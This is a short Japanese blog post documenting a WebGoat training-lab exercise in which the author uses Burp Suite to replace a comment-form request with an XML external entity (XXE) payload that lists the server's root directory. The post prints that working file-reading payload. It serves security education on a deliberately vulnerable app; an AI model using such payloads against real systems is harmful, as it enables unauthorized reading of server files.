shikata ga nai

Private? There is no such things.

WebGOATでXXE⓷を演習してみた

Hello there, ('ω')ノ

 

WebGOATでXXE⓷を選択して。

フォームに送信するときに、コメントフィールドにXXEインジェクションを実行して。

ファイルシステムのルートディレクトリをリストしてみてくださいと。

まずは、動作確認を。

 

f:id:ThisIsOne:20200724090307p:plain

 

Burp Suiteでリクエストを確認して。

 

f:id:ThisIsOne:20200724091846p:plain

 

リクエスト内容を下記のようにXMLに変更して。

リピータでレスポンスを確認して。

 

<?xml version="1.0"?>
<!DOCTYPE comment [
<!ENTITY test SYSTEM "file:///">
]>
<comment><text>&test;</text></comment>

 

f:id:ThisIsOne:20200724101421p:plain

 

実行すると、ルートディレクトリを取得できたようで。

 

f:id:ThisIsOne:20200724101621p:plain

 

念のため確認を。

 

f:id:ThisIsOne:20200724101525p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain